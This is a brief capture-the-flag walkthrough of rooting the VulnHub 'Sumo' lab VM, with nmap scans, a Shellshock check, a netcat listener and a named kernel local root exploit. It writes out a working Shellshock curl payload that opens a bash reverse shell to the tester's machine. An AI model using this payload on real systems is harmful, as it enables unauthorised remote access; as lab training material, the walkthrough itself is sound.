Rough steps to root on
VulnHub Sumo
- A quick nmap scan shows some fairly dated versions:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:17:08:AB (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
- Running dirbuster scan using OWASP ZAP shows cgi is clearly misbehaving.
- So a check to see if the server is vulnerable to shellshock given the behavior noted above and we find it is.
$ nmap 192.168.50.221 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 10:39 IST
Nmap scan report for 192.168.50.221
Host is up (0.0041s latency).
PORT STATE SERVICE
80/tcp open http
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known as Shellshock. It seems the server
| is executing commands injected via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ http://seclists.org/oss-sec/2014/q3/685
- Shellshock is around since 2014 so there is a lots of exploit info out in the wild. A quick search and we figure a way to initiate a reverse shell. Before that we set a netcat session on out local machine to listen on port 4444.
$ nc -lvp 4444 -s 192.168.50.165
Listening on lpt-01 4444
- Next we introduce our reverse shell string to the remote server with the following command, the second command gets us a TTY shell.
curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.50.165/4444 0<&1 2>&1" http://192.168.50.221/cgi-bin/testpython -c 'import pty; pty.spawn("/bin/sh")'
- After going around the houses trying multiple vulnerabilities I was having no luck. The results ranged from failing to exploit, failing to run to forcing the VM to reboot. The latter happened with multiple exploits so as a test I removed VM Player, installed Virtual Box and tried again.
- This time I was a lot quicker as I just had to copy the compiled exploits and run. I got similar results in terms of exploits not running or getting no output from them but no VM reboots. I went back to one of the earlier exploits and . . . . . . success!
- The exploit that worked for me was perf_swevent_init Local root exploit available on exploit-db. as mentioned this caused a VM crash when running Sumo on VMware Workstation Player but once I switched to VirtualBox the same compiled exploit ran successfully.
